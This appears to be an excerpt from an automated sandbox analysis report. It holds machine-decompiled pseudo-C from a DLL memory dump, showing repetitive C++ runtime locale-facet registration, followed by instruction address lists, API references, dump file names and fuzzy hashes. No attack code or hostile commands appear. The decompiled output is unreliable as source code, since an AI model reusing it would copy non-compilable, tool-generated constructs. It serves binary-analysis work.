																E6E1A9DBF(0x6e1ec3ec, _t422, _t563, _t579, 8);
																E6E18F2A5(_t607 - 0x14, 0);
																_t580 =  *0x6e22172c; // 0x0
																 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
																 *(_t607 - 0x10) = _t580;
																_t564 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e2216d8, _t563, _t580));
																__eflags = _t564;
																if(_t564 != 0) {
																	L33:
																	E6E18F30C(_t607 - 0x14);
																	return E6E1A9D88(_t564);
																} else {
																	__eflags = _t580;
																	if(_t580 == 0) {
																		_push( *((intOrPtr*)(_t607 + 8)));
																		_push(_t607 - 0x10);
																		__eflags = E6E19ADF7(_t422, _t564, _t580) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t422, _t564, _t580, 8);
																			E6E18F2A5(_t607 - 0x14, 0);
																			_t581 =  *0x6e221700; // 0x0
																			 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
																			 *(_t607 - 0x10) = _t581;
																			_t565 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e2216b4, _t564, _t581));
																			__eflags = _t565;
																			if(_t565 != 0) {
																				L40:
																				E6E18F30C(_t607 - 0x14);
																				return E6E1A9D88(_t565);
																			} else {
																				__eflags = _t581;
																				if(_t581 == 0) {
																					_push( *((intOrPtr*)(_t607 + 8)));
																					_push(_t607 - 0x10);
																					__eflags = E6E19AE7C(_t422, _t565, _t581) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t422, _t565, _t581, 8);
																						E6E18F2A5(_t607 - 0x14, 0);
																						_t582 =  *0x6e2216fc; // 0x0
																						 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
																						 *(_t607 - 0x10) = _t582;
																						_t566 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e2216b0, _t565, _t582));
																						__eflags = _t566;
																						if(_t566 != 0) {
																							L47:
																							E6E18F30C(_t607 - 0x14);
																							return E6E1A9D88(_t566);
																						} else {
																							__eflags = _t582;
																							if(_t582 == 0) {
																								_push( *((intOrPtr*)(_t607 + 8)));
																								_push(_t607 - 0x10);
																								__eflags = E6E19AF00(_t422, _t566, _t582) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ec3ec, _t422, _t566, _t582, 8);
																									E6E18F2A5(_t607 - 0x14, 0);
																									_t583 =  *0x6e221710; // 0x0
																									 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
																									 *(_t607 - 0x10) = _t583;
																									_t567 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e2216bc, _t566, _t583));
																									__eflags = _t567;
																									if(_t567 != 0) {
																										L54:
																										E6E18F30C(_t607 - 0x14);
																										return E6E1A9D88(_t567);
																									} else {
																										__eflags = _t583;
																										if(_t583 == 0) {
																											_push( *((intOrPtr*)(_t607 + 8)));
																											_push(_t607 - 0x10);
																											__eflags = E6E19AF85(_t422, _t567, _t583) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E161CB5(__eflags);
																												asm("int3");
																												E6E1A9DBF(0x6e1ec3ec, _t422, _t567, _t583, 8);
																												E6E18F2A5(_t607 - 0x14, 0);
																												_t584 =  *0x6e2216e8; // 0x0
																												 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
																												 *(_t607 - 0x10) = _t584;
																												_t568 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e22169c, _t567, _t584));
																												__eflags = _t568;
																												if(_t568 != 0) {
																													L61:
																													E6E18F30C(_t607 - 0x14);
																													return E6E1A9D88(_t568);
																												} else {
																													__eflags = _t584;
																													if(_t584 == 0) {
																														_push( *((intOrPtr*)(_t607 + 8)));
																														_push(_t607 - 0x10);
																														__eflags = E6E19AFED(_t422, _t568, _t584) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E161CB5(__eflags);
																															asm("int3");
																															E6E1A9DBF(0x6e1ec3ec, _t422, _t568, _t584, 8);
																															E6E18F2A5(_t607 - 0x14, 0);
																															_t585 =  *0x6e221714; // 0x0
																															 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
																															 *(_t607 - 0x10) = _t585;
																															_t569 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e2216c0, _t568, _t585));
																															__eflags = _t569;
																															if(_t569 != 0) {
																																L68:
																																E6E18F30C(_t607 - 0x14);
																																return E6E1A9D88(_t569);
																															} else {
																																__eflags = _t585;
																																if(_t585 == 0) {
																																	_push( *((intOrPtr*)(_t607 + 8)));
																																	_push(_t607 - 0x10);
																																	__eflags = E6E19B055(_t422, _t569, _t585) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E161CB5(__eflags);
																																		asm("int3");
																																		E6E1A9DBF(0x6e1ec3ec, _t422, _t569, _t585, 8);
																																		E6E18F2A5(_t607 - 0x14, 0);
																																		_t586 =  *0x6e221718; // 0x0
																																		 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
																																		 *(_t607 - 0x10) = _t586;
																																		_t570 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e2216c4, _t569, _t586));
																																		__eflags = _t570;
																																		if(_t570 != 0) {
																																			L75:
																																			E6E18F30C(_t607 - 0x14);
																																			return E6E1A9D88(_t570);
																																		} else {
																																			__eflags = _t586;
																																			if(_t586 == 0) {
																																				_push( *((intOrPtr*)(_t607 + 8)));
																																				_push(_t607 - 0x10);
																																				__eflags = E6E19B0BD(_t422, _t570, _t586) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E161CB5(__eflags);
																																					asm("int3");
																																					E6E1A9DBF(0x6e1ec3ec, _t422, _t570, _t586, 8);
																																					E6E18F2A5(_t607 - 0x14, 0);
																																					_t587 =  *0x6e221734; // 0x0
																																					 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
																																					 *(_t607 - 0x10) = _t587;
																																					_t571 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e2216e0, _t570, _t587));
																																					__eflags = _t571;
																																					if(_t571 != 0) {
																																						L82:
																																						E6E18F30C(_t607 - 0x14);
																																						return E6E1A9D88(_t571);
																																					} else {
																																						__eflags = _t587;
																																						if(_t587 == 0) {
																																							_push( *((intOrPtr*)(_t607 + 8)));
																																							_push(_t607 - 0x10);
																																							__eflags = E6E19B138(_t422, _t571, _t587) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E161CB5(__eflags);
																																								asm("int3");
																																								E6E1A9DBF(0x6e1ec3ec, _t422, _t571, _t587, 8);
																																								E6E18F2A5(_t607 - 0x14, 0);
																																								_t588 =  *0x6e221704; // 0x0
																																								 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
																																								 *(_t607 - 0x10) = _t588;
																																								_t572 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e2216b8, _t571, _t588));
																																								__eflags = _t572;
																																								if(_t572 != 0) {
																																									L89:
																																									E6E18F30C(_t607 - 0x14);
																																									return E6E1A9D88(_t572);
																																								} else {
																																									__eflags = _t588;
																																									if(_t588 == 0) {
																																										_push( *((intOrPtr*)(_t607 + 8)));
																																										_push(_t607 - 0x10);
																																										__eflags = E6E19B1A4(_t422, _t572, _t588) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E161CB5(__eflags);
																																											asm("int3");
																																											E6E1A9DBF(0x6e1ec3ec, _t422, _t572, _t588, 8);
																																											E6E18F2A5(_t607 - 0x14, 0);
																																											_t589 =  *0x6e221738; // 0x0
																																											 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
																																											 *(_t607 - 0x10) = _t589;
																																											_t573 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e2216e4, _t572, _t589));
																																											__eflags = _t573;
																																											if(_t573 != 0) {
																																												L96:
																																												E6E18F30C(_t607 - 0x14);
																																												return E6E1A9D88(_t573);
																																											} else {
																																												__eflags = _t589;
																																												if(_t589 == 0) {
																																													_push( *((intOrPtr*)(_t607 + 8)));
																																													_push(_t607 - 0x10);
																																													__eflags = E6E19B210(_t422, _t573, _t589) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E161CB5(__eflags);
																																														asm("int3");
																																														E6E1A9DBF(0x6e1ec3ec, _t422, _t573, _t589, 8);
																																														E6E18F2A5(_t607 - 0x14, 0);
																																														_t590 =  *0x6e221708; // 0x0
																																														 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
																																														 *(_t607 - 0x10) = _t590;
																																														_t574 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e221698, _t573, _t590));
																																														__eflags = _t574;
																																														if(_t574 != 0) {
																																															L103:
																																															E6E18F30C(_t607 - 0x14);
																																															return E6E1A9D88(_t574);
																																														} else {
																																															__eflags = _t590;
																																															if(_t590 == 0) {
																																																_push( *((intOrPtr*)(_t607 + 8)));
																																																_push(_t607 - 0x10);
																																																_t353 = E6E19B284(_t422, _t574, _t590);
																																																_pop(_t512);
																																																__eflags = _t353 - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E161CB5(__eflags);
																																																	asm("int3");
																																																	E6E1A9DBF(0x6e1ecb1a, _t422, _t574, _t590, 4);
																																																	_t591 = _t512;
																																																	 *(_t607 - 0x10) = _t591;
																																																	 *((intOrPtr*)(_t591 + 4)) =  *((intOrPtr*)(_t607 + 0xc));
																																																	_push( *((intOrPtr*)(_t607 + 0x14)));
																																																	_t187 = _t607 - 4;
																																																	 *_t187 =  *(_t607 - 4) & 0x00000000;
																																																	__eflags =  *_t187;
																																																	 *_t591 = 0x6e1f225c;
																																																	 *((char*)(_t591 + 0x28)) =  *((intOrPtr*)(_t607 + 0x10));
																																																	E6E19F3D8(_t422, _t512, _t558, _t574, _t591,  *_t187);
																																																	return E6E1A9D88(_t591,  *((intOrPtr*)(_t607 + 8)));
																																																} else {
																																																	_t574 =  *(_t607 - 0x10);
																																																	 *(_t607 - 0x10) = _t574;
																																																	 *(_t607 - 4) = 1;
																																																	E6E1911C1(__eflags, _t574);
																																																	 *0x6e1ee1b4();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t574 + 4))))();
																																																	 *0x6e221708 = _t574;
																																																	goto L103;
																																																}
																																															} else {
																																																_t574 = _t590;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t573 =  *(_t607 - 0x10);
																																														 *(_t607 - 0x10) = _t573;
																																														 *(_t607 - 4) = 1;
																																														E6E1911C1(__eflags, _t573);
																																														 *0x6e1ee1b4();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t573 + 4))))();
																																														 *0x6e221738 = _t573;
																																														goto L96;
																																													}
																																												} else {
																																													_t573 = _t589;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t572 =  *(_t607 - 0x10);
																																											 *(_t607 - 0x10) = _t572;
																																											 *(_t607 - 4) = 1;
																																											E6E1911C1(__eflags, _t572);
																																											 *0x6e1ee1b4();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t572 + 4))))();
																																											 *0x6e221704 = _t572;
																																											goto L89;
																																										}
																																									} else {
																																										_t572 = _t588;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t571 =  *(_t607 - 0x10);
																																								 *(_t607 - 0x10) = _t571;
																																								 *(_t607 - 4) = 1;
																																								E6E1911C1(__eflags, _t571);
																																								 *0x6e1ee1b4();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t571 + 4))))();
																																								 *0x6e221734 = _t571;
																																								goto L82;
																																							}
																																						} else {
																																							_t571 = _t587;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t570 =  *(_t607 - 0x10);
																																					 *(_t607 - 0x10) = _t570;
																																					 *(_t607 - 4) = 1;
																																					E6E1911C1(__eflags, _t570);
																																					 *0x6e1ee1b4();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t570 + 4))))();
																																					 *0x6e221718 = _t570;
																																					goto L75;
																																				}
																																			} else {
																																				_t570 = _t586;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t569 =  *(_t607 - 0x10);
																																		 *(_t607 - 0x10) = _t569;
																																		 *(_t607 - 4) = 1;
																																		E6E1911C1(__eflags, _t569);
																																		 *0x6e1ee1b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t569 + 4))))();
																																		 *0x6e221714 = _t569;
																																		goto L68;
																																	}
																																} else {
																																	_t569 = _t585;
																																	goto L68;
																																}
																															}
																														} else {
																															_t568 =  *(_t607 - 0x10);
																															 *(_t607 - 0x10) = _t568;
																															 *(_t607 - 4) = 1;
																															E6E1911C1(__eflags, _t568);
																															 *0x6e1ee1b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t568 + 4))))();
																															 *0x6e2216e8 = _t568;
																															goto L61;
																														}
																													} else {
																														_t568 = _t584;
																														goto L61;
																													}
																												}
																											} else {
																												_t567 =  *(_t607 - 0x10);
																												 *(_t607 - 0x10) = _t567;
																												 *(_t607 - 4) = 1;
																												E6E1911C1(__eflags, _t567);
																												 *0x6e1ee1b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t567 + 4))))();
																												 *0x6e221710 = _t567;
																												goto L54;
																											}
																										} else {
																											_t567 = _t583;
																											goto L54;
																										}
																									}
																								} else {
																									_t566 =  *(_t607 - 0x10);
																									 *(_t607 - 0x10) = _t566;
																									 *(_t607 - 4) = 1;
																									E6E1911C1(__eflags, _t566);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t566 + 4))))();
																									 *0x6e2216fc = _t566;
																									goto L47;
																								}
																							} else {
																								_t566 = _t582;
																								goto L47;
																							}
																						}
																					} else {
																						_t565 =  *(_t607 - 0x10);
																						 *(_t607 - 0x10) = _t565;
																						 *(_t607 - 4) = 1;
																						E6E1911C1(__eflags, _t565);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t565 + 4))))();
																						 *0x6e221700 = _t565;
																						goto L40;
																					}
																				} else {
																					_t565 = _t581;
																					goto L40;
																				}
																			}
																		} else {
																			_t564 =  *(_t607 - 0x10);
																			 *(_t607 - 0x10) = _t564;
																			 *(_t607 - 4) = 1;
																			E6E1911C1(__eflags, _t564);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t564 + 4))))();
																			 *0x6e22172c = _t564;
																			goto L33;
																		}
																	} else {
																		_t564 = _t580;
																		goto L33;
																	}
																}
															} else {
																_t563 =  *(_t607 - 0x10);
																 *(_t607 - 0x10) = _t563;
																 *(_t607 - 4) = 1;
																E6E1911C1(__eflags, _t563);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t563 + 4))))();
																 *0x6e221730 = _t563;
																goto L26;
															}
														} else {
															_t563 = _t579;
															goto L26;
														}
													}
												} else {
													_t562 =  *(_t607 - 0x10);
													 *(_t607 - 0x10) = _t562;
													 *(_t607 - 4) = 1;
													E6E1911C1(__eflags, _t562);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t562 + 4))))();
													 *0x6e2216f8 = _t562;
													goto L19;
												}
											} else {
												_t562 = _t578;
												goto L19;
											}
										}
									} else {
										_t561 =  *(_t607 - 0x10);
										 *(_t607 - 0x10) = _t561;
										 *(_t607 - 4) = 1;
										E6E1911C1(__eflags, _t561);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t561 + 4))))();
										 *0x6e221728 = _t561;
										goto L12;
									}
								} else {
									_t561 = _t577;
									goto L12;
								}
							}
						} else {
							_t560 =  *(_t607 - 0x10);
							 *(_t607 - 0x10) = _t560;
							 *(_t607 - 4) = 1;
							E6E1911C1(__eflags, _t560);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t560 + 4))))();
							 *0x6e2216f4 = _t560;
							goto L5;
						}
					} else {
						_t560 = _t576;
						goto L5;
					}
				}
			}

0x6e19908b
0x6e199092
0x6e19909c
0x6e1990a1
0x6e1990ac
0x6e1990b0
0x6e1990bc
0x6e1990c1
0x6e1990c5
0x6e19910a
0x6e19910d
0x6e199119
0x6e1990c7
0x6e1990c9
0x6e1990cf
0x6e1990d5
0x6e1990dd
0x6e1990e0
0x6e19911a
0x6e19911f
0x6e199127
0x6e199131
0x6e199136
0x6e199141
0x6e199145
0x6e199156
0x6e199158
0x6e19915a
0x6e19919f
0x6e1991a2
0x6e1991ae
0x6e19915c
0x6e19915c
0x6e19915e
0x6e199164
0x6e19916a
0x6e199172
0x6e199175
0x6e1991af
0x6e1991b4
0x6e1991bc
0x6e1991c6
0x6e1991cb
0x6e1991d6
0x6e1991da
0x6e1991eb
0x6e1991ed
0x6e1991ef
0x6e199234
0x6e199237
0x6e199243
0x6e1991f1
0x6e1991f1
0x6e1991f3
0x6e1991f9
0x6e1991ff
0x6e199207
0x6e19920a
0x6e199244
0x6e199249
0x6e199251
0x6e19925b
0x6e199260
0x6e19926b
0x6e19926f
0x6e199280
0x6e199282
0x6e199284
0x6e1992c9
0x6e1992cc
0x6e1992d8
0x6e199286
0x6e199286
0x6e199288
0x6e19928e
0x6e199294
0x6e19929c
0x6e19929f
0x6e1992d9
0x6e1992de
0x6e1992e6
0x6e1992f0
0x6e1992f5
0x6e199300
0x6e199304
0x6e199315
0x6e199317
0x6e199319
0x6e19935e
0x6e199361
0x6e19936d
0x6e19931b
0x6e19931b
0x6e19931d
0x6e199323
0x6e199329
0x6e199331
0x6e199334
0x6e19936e
0x6e199373
0x6e19937b
0x6e199385
0x6e19938a
0x6e199395
0x6e199399
0x6e1993aa
0x6e1993ac
0x6e1993ae
0x6e1993f3
0x6e1993f6
0x6e199402
0x6e1993b0
0x6e1993b0
0x6e1993b2
0x6e1993b8
0x6e1993be
0x6e1993c6
0x6e1993c9
0x6e199403
0x6e199408
0x6e199410
0x6e19941a
0x6e19941f
0x6e19942a
0x6e19942e
0x6e19943f
0x6e199441
0x6e199443
0x6e199488
0x6e19948b
0x6e199497
0x6e199445
0x6e199445
0x6e199447
0x6e19944d
0x6e199453
0x6e19945b
0x6e19945e
0x6e199498
0x6e19949d
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994d4
0x6e1994d6
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447
0x6e1993cb
0x6e1993cb
0x6e1993ce
0x6e1993d2
0x6e1993d6
0x6e1993e3
0x6e1993eb
0x6e1993ed
0x00000000
0x6e1993ed
0x6e1993b4
0x6e1993b4
0x00000000
0x6e1993b4
0x6e1993b2
0x6e199336
0x6e199336
0x6e199339
0x6e19933d
0x6e199341
0x6e19934e
0x6e199356
0x6e199358
0x00000000
0x6e199358
0x6e19931f
0x6e19931f
0x00000000
0x6e19931f
0x6e19931d
0x6e1992a1
0x6e1992a1
0x6e1992a4
0x6e1992a8
0x6e1992ac
0x6e1992b9
0x6e1992c1
0x6e1992c3
0x00000000
0x6e1992c3
0x6e19928a
0x6e19928a
0x00000000
0x6e19928a
0x6e199288
0x6e19920c
0x6e19920c
0x6e19920f
0x6e199213
0x6e199217
0x6e199224
0x6e19922c
0x6e19922e
0x00000000
0x6e19922e
0x6e1991f5
0x6e1991f5
0x00000000
0x6e1991f5
0x6e1991f3
0x6e199177
0x6e199177
0x6e19917a
0x6e19917e
0x6e199182
0x6e19918f
0x6e199197
0x6e199199
0x00000000
0x6e199199
0x6e199160
0x6e199160
0x00000000
0x6e199160
0x6e19915e
0x6e1990e2
0x6e1990e2
0x6e1990e5
0x6e1990e9
0x6e1990ed
0x6e1990fa
0x6e199102
0x6e199104
0x00000000
0x6e199104
0x6e1990cb
0x6e1990cb
0x00000000
0x6e1990cb
0x6e1990c9

APIs

__EH_prolog3.LIBCMT ref: 6E199092
std::_Lockit::_Lockit.LIBCPMT ref: 6E19909C

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1990ED
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19910D
Concurrency::cancel_current_task.LIBCPMT ref: 6E19911A

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 69f2cc6b6a327ca234f64a5c1b5496c1897c78cd81ff0b3418bbbcc355aa8b48
Instruction ID: 857a36f2ed671de1a3cf20e651f656c133df87466ab4c38e8023f070a43b368e
Opcode Fuzzy Hash: 69f2cc6b6a327ca234f64a5c1b5496c1897c78cd81ff0b3418bbbcc355aa8b48
Instruction Fuzzy Hash: 3B01D635A0011A9FCB05DBE4C928AFD777DBF95324F244819E821AB280CF359AC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E199120, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E199120(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t182;
				void* _t330;
				signed int _t479;
				void* _t522;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t539;
				signed int _t540;
				signed int _t541;
				signed int _t542;
				signed int _t543;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t547;
				signed int _t548;
				signed int _t549;
				signed int _t550;
				signed int _t551;
				signed int _t552;
				signed int _t553;
				void* _t568;

				_t395 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t568 - 0x14, 0);
				_t539 =  *0x6e221728; // 0x0
				 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
				 *(_t568 - 0x10) = _t539;
				_t182 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(__ebx, 0x6e2216d4, __edi, _t539));
				_t524 = _t182;
				if(_t182 != 0) {
					L5:
					E6E18F30C(_t568 - 0x14);
					return E6E1A9D88(_t524);
				} else {
					if(_t539 == 0) {
						_push( *((intOrPtr*)(_t568 + 8)));
						_push(_t568 - 0x10);
						__eflags = E6E19ACA3(__ebx, _t524, _t539) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t395, _t524, _t539, 8);
							E6E18F2A5(_t568 - 0x14, 0);
							_t540 =  *0x6e2216f8; // 0x0
							 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
							 *(_t568 - 0x10) = _t540;
							_t525 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(_t395, 0x6e2216ac, _t524, _t540));
							__eflags = _t525;
							if(_t525 != 0) {
								L12:
								E6E18F30C(_t568 - 0x14);
								return E6E1A9D88(_t525);
							} else {
								__eflags = _t540;
								if(_t540 == 0) {
									_push( *((intOrPtr*)(_t568 + 8)));
									_push(_t568 - 0x10);
									__eflags = E6E19AD0B(_t395, _t525, _t540) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t395, _t525, _t540, 8);
										E6E18F2A5(_t568 - 0x14, 0);
										_t541 =  *0x6e221730; // 0x0
										 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
										 *(_t568 - 0x10) = _t541;
										_t526 = E6E162171( *((intOrPtr*)(_t568 + 8)), E6E161F29(_t395, 0x6e2216dc, _t525, _t541));
										__eflags = _t526;
										if(_t526 != 0) {
											L19:
											E6E18F30C(_t568 - 0x14);
											return E6E1A9D88(_t526);
										} else {
											__eflags = _t541;
											if(_t541 == 0) {
												_push( *((intOrPtr*)(_t568 + 8)));
												_push(_t568 - 0x10);
												__eflags = E6E19AD73(_t395, _t526, _t541) - 0xffffffff;
												if(__eflags == 0) {
